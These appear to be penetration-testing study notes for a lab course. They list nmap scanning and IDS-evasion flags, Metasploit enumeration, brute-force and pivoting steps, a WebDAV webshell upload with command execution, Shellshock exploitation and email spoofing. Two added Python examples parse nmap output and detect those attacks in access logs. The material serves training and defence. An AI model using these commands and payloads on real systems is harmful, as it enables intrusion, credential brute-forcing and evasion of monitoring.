Enumeration

Information Gathering

  • Passive: whois, whatweb, dnsrecon, wafw00f, sublist3r, Google dorks, theHarvester
  • Active: DNS zone transfer, nmap

Footprinting & Scanning

  • basic networking (OSI layers)
  • nmap commands
    • -sn for a ping sweep (host discovery without a port scan)
    • scan common ports first for faster results, e.g. -p 22,23,80,443,3389
  • Firewall detection & IDS evasion
    • using malformed packets
    • fragment packets with -f (fragment size is tied to the MTU; --mtu sets it explicitly)
    • speed up scans with the timing template -T4
    • nmap output formats
    • sometimes it makes sense to slow scans down so they stay below IDS alert thresholds
    • -D to set decoy IP addresses
    • output: -oN normal, -oX XML (importable into Metasploit), -oG grepable
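The three output formats above differ only in layout, so a small parser can read -oG and -oX into the same structure and then compare two scans of the same host (the "what changed since the baseline" question a defender asks of scan data). This is an added example, not code from the original notes; the scan output embedded in it is constructed, not real scanner output.

```python
"""Parse nmap -oG (grepable) and -oX (XML) output and diff two scans.

Added example, not from the original notes: the scan output below is
constructed, not real scanner output.
"""
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oG -` output for one host.
SAMPLE_GREPABLE = """\
# Nmap 7.94 scan initiated as: nmap -sV -oG - 10.0.0.5
Host: 10.0.0.5 (demo.example)\tStatus: Up
Host: 10.0.0.5 (demo.example)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 80/open/tcp//http//Apache httpd 2.4.38/, 443/closed/tcp//https///\tIgnored State: filtered (997)
# Nmap done
"""

# Constructed earlier scan of the same host, used as the baseline for diffing.
BASELINE_GREPABLE = """\
Host: 10.0.0.5 (demo.example)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9/, 80/closed/tcp//http///\tIgnored State: filtered (998)
"""

# Constructed sample of `nmap -sV -oX -` output describing the same result.
SAMPLE_XML = """\
<?xml version="1.0"?>
<nmaprun scanner="nmap" version="7.94">
  <host><status state="up"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.9"/></port>
      <port protocol="tcp" portid="80"><state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.38"/></port>
      <port protocol="tcp" portid="443"><state state="closed"/>
        <service name="https"/></port>
    </ports>
  </host>
</nmaprun>
"""


def parse_grepable(text):
    """Return {ip: [(port, proto, state, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue
        # Tab-separated "Key: value" fields; "Ports:" holds comma-separated entries
        # of the form port/state/proto/owner/service/rpcinfo/version/.
        fields = {}
        for chunk in line.split("\t"):
            key, _, value = chunk.partition(": ")
            fields[key] = value
        addr = fields["Host"].split()[0]
        entries = hosts.setdefault(addr, [])
        for entry in filter(None, fields.get("Ports", "").split(", ")):
            port, state, proto, _owner, service, _rpc, version = entry.split("/", 6)
            entries.append((int(port), proto, state, service, version.rstrip("/")))
    return hosts


def parse_xml(text):
    """Return the same structure from -oX output (the format db_import reads)."""
    # Stdlib ElementTree keeps this self-contained; for scanner output you did
    # not produce yourself, parse with defusedxml instead.
    root = ET.fromstring(text)
    hosts = {}
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        entries = hosts.setdefault(addr_el.get("addr"), [])
        for port in host.iter("port"):
            svc = port.find("service")
            name = svc.get("name", "") if svc is not None else ""
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            version = " ".join(p for p in parts if p)
            entries.append((int(port.get("portid")), port.get("protocol"),
                            port.find("state").get("state"), name, version))
    return hosts


def open_ports(hosts):
    """{ip: sorted list of port numbers reported open}."""
    return {ip: sorted(p for p, _proto, state, _svc, _ver in entries if state == "open")
            for ip, entries in hosts.items()}


def diff_open_ports(baseline, current):
    """Ports newly open or newly closed per host, for change review."""
    result = {}
    for ip in set(baseline) | set(current):
        before, after = set(baseline.get(ip, [])), set(current.get(ip, []))
        if before != after:
            result[ip] = {"new": sorted(after - before), "closed": sorted(before - after)}
    return result


if __name__ == "__main__":
    now = open_ports(parse_grepable(SAMPLE_GREPABLE))
    then = open_ports(parse_grepable(BASELINE_GREPABLE))
    print("open now:", now)
    print("changes since baseline:", diff_open_ports(then, now))
```

Both parsers return the same tuples for the same scan, so a baseline can be kept in whichever format is convenient; the diff is what you would feed into a ticket when a port appears that the asset inventory does not explain.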

Enumeration

  • host discovery and service detection
    • -sV for service/version detection
  • import nmap results into msf
    • db_import (load an -oX file) and db_nmap (run nmap from msfconsole)
  • find msf auxiliary modules with search
  • steps to exploit
    • nmap, identify services and versions, check for matching msf exploits
  • pivot to another subnet using msf
    • enter the shell and run ip addr to find the next subnet
    • run autoroute -s 192.180.108.2 to add the route
    • use portscan tcp to scan the next subnet, set ports to 1-1000
    • sessions -i 1 to switch between sessions
    • upload /root/static-binaries/nmap /tmp/nmap to push a static binary to the host
  • ftp enumeration
    • two msf modules, ftp_version and ftp_login
    • for ftp_login, you can set a USER_FILE and PASS_FILE
  • smb enumeration
    • using nmap: nmap --script smb-os-discovery.nse -p 445 <target>
    • msf modules like smb_version
    • get the NetBIOS name with nmblookup -A demo.ine.local
    • list shares with smbclient -L demo.ine.local -N
    • anonymous (null session) connection with rpcclient -U "" -N demo.ine.local
  • apache enumeration
    • using msf modules like http_version, robots_txt, http_header, brute_dirs, dir_scanner, dir_listing, files_dir, http_put, apache_userdir_enum
  • mysql enumeration
    • using msf modules like mysql_version, mysql_login, mysql_enum, mysql_sql, mysql_file_enum, mysql_hashdump (one valid credential can dump all password hashes), mysql_schemadump, mysql_writable_dirs
  • ssh enumeration
    • using msf modules like ssh_version
    • ssh brute force using the msf module ssh_login
  • smtp enumeration
    • connect to the server with netcat or telnet
    • smtp-user-enum -U usernames.txt -t demo.ine.local
    • msf module smtp_enum to enumerate usernames
    • send a test email with: -f admin@attacker.xyz -t root@openmailbox.xyz -s demo.ine.local -u Fakemail -m "Hi root, a fake from admin" -o tls=no

Vulnerability Assessment

  • WebDAV on IIS: davtest
    • WebDAV is an HTTP extension for remote file management
    • test anonymous access: davtest -url http://demo.ine.local/webdav
    • test a password login: davtest -auth bob:password_123321 -url http://demo.ine.local/webdav
    • log in with cadaver http://demo.ine.local/webdav and use put /usr/share/webshells/asp/webshell.asp to upload the payload
    • after uploading, code execution via http://demo.ine.local/webdav/webshell.asp?cmd=whoami
  • shellshock
    • Shellshock (CVE-2014-6271) is an RCE vulnerability in how bash parses function definitions passed through environment variables
    • look for a CGI file in the website source code
    • check for the vulnerability with nmap against that CGI file: nmap --script http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" demo.ine.local
    • exploit steps are on GitHub: https://github.com/opsxcq/exploit-CVE-2014-6271
    • capture the request, send it to Repeater and replace the User-Agent header with the payload
  • wmap web app scan
    • it is an msf plugin, loaded with load wmap
    • add the target (both IP and URL) with wmap_sites -a 192.157.89.3 and wmap_targets -t http://192.157.89.3; check what was added with wmap_sites -l and wmap_targets -l
    • wmap_run -t to list the enabled modules, then wmap_run -e to run them
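Seen from the server side, the WebDAV and Shellshock steps above leave very recognisable traces: a PUT of a server-side script into the WebDAV directory, a follow-up request to that script with a command parameter, and a header value beginning with the bash function-definition string. The detector below runs those three checks over Apache combined-format access log lines. It is an added example for defenders, not code from the original notes; the log lines, rule names, script-extension list and the /webdav/ path are constructed assumptions.

```python
"""Flag WebDAV script uploads, webshell command parameters and Shellshock
probes in Apache combined-format access logs.

Added example for defenders, not from the original notes; the rule names and
the sample log are constructed.
"""
import re
from posixpath import splitext
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log (combined format); not from a real server.
SAMPLE_LOG = """\
10.0.0.9 - - [10/Oct/2023:13:55:36 +0000] "PUT /webdav/webshell.asp HTTP/1.1" 201 0 "-" "DAV.pm/v0.49"
10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /webdav/webshell.asp?cmd=whoami HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /gettime.cgi HTTP/1.1" 200 42 "-" "() { :;}; echo shellshock-test"
10.0.0.20 - - [10/Oct/2023:13:57:00 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.21 - - [10/Oct/2023:13:58:00 +0000] "PUT /webdav/report.txt HTTP/1.1" 201 0 "-" "cadaver/0.23.3"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Server-side script extensions that should never be writable through WebDAV
# (assumed list; extend for the stacks you actually run).
SCRIPT_EXTS = {".asp", ".aspx", ".php", ".jsp", ".cgi", ".pl", ".sh"}
# The WebDAV-enabled directory in the sample deployment (assumption).
WEBDAV_PREFIX = "/webdav/"
# IDS-style Shellshock signature: a bash function definition "() {" in a
# header value.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
# Query parameters commonly used by simple webshells to pass a command.
CMD_PARAMS = {"cmd", "command", "exec"}


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def check_request(rec):
    """Return the list of rule names triggered by one parsed log record."""
    hits = []
    url = urlsplit(rec["target"])
    ext = splitext(url.path)[1].lower()
    if (rec["method"].upper() == "PUT" and url.path.startswith(WEBDAV_PREFIX)
            and ext in SCRIPT_EXTS):
        hits.append("webdav_script_upload")
    if ext in SCRIPT_EXTS and CMD_PARAMS & set(parse_qs(url.query)):
        hits.append("webshell_command_param")
    # Any header the CGI runtime exports as an environment variable can carry
    # the Shellshock string; User-Agent and Referer are the two the combined
    # log format records.
    if any(SHELLSHOCK_RE.search(h) for h in (rec["ua"], rec["referer"])):
        hits.append("shellshock_probe")
    return hits


def analyze(log_text):
    """Map each client IP to the set of rules it triggered across the log."""
    findings = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # malformed line: skip rather than abort the review
        for rule in check_request(rec):
            findings.setdefault(rec["ip"], set()).add(rule)
    return findings


if __name__ == "__main__":
    for ip, rules in sorted(analyze(SAMPLE_LOG).items()):
        print(f"{ip}: {', '.join(sorted(rules))}")
```

On the sample log only 10.0.0.9 is reported, with all three rules; the PUT of a .txt file from 10.0.0.21 is ordinary WebDAV use and is left alone. The upload rule is the cheapest to act on: a 201 response to a PUT of a script under the WebDAV root means the server itself confirmed the write, so the first hardening step is to deny PUT for script extensions there regardless of authentication.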

Written By

GitHub Contributor Team